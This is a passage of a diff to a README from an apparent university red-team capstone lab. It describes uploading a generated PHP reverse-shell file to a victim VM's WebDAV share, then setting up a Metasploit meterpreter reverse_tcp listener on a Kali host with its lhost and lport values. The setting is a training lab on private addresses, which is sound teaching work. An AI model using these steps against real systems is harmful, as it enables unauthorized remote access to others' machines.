Jay-Idrees/UPenn-CyberSecurity-Red-vs-Blue-Team-Metasploit-Kibana-Capstone/README.md

 - Pasting the `open-shell.php` script file inside the Capsone VM file sharing and running it

+- Once `open-shell.php` is generated then you can copy it into `dav://192.168.1.105/webdav/` from the browser - this can be done from Kali Linux as you are now already connected to the victim's machine

 ![](images-red/payload-pasted.png)

-- Once `open-shell.php` is generated then you can copy it into `dav://192.168.1.105/webdav/` from the browser - this can be done from Kali Linux as you are now already connected to the victim's machine

 - Now in Kali VM run **Metasploit** and run the following commands to prepare for listening and being ready to accept any retrograde connection coming from Capstone VM(victim).
-Run the following commands:

 - `msfconsole`
 - `set payload php/meterpreter/reverse_tcp`
-- `set lhost 192.168.1.90`
+- `set lhost 192.168.1.90` notice that there is no "=" between lhost and ip
 - `set lport 666`
 - `show options`
 - `run`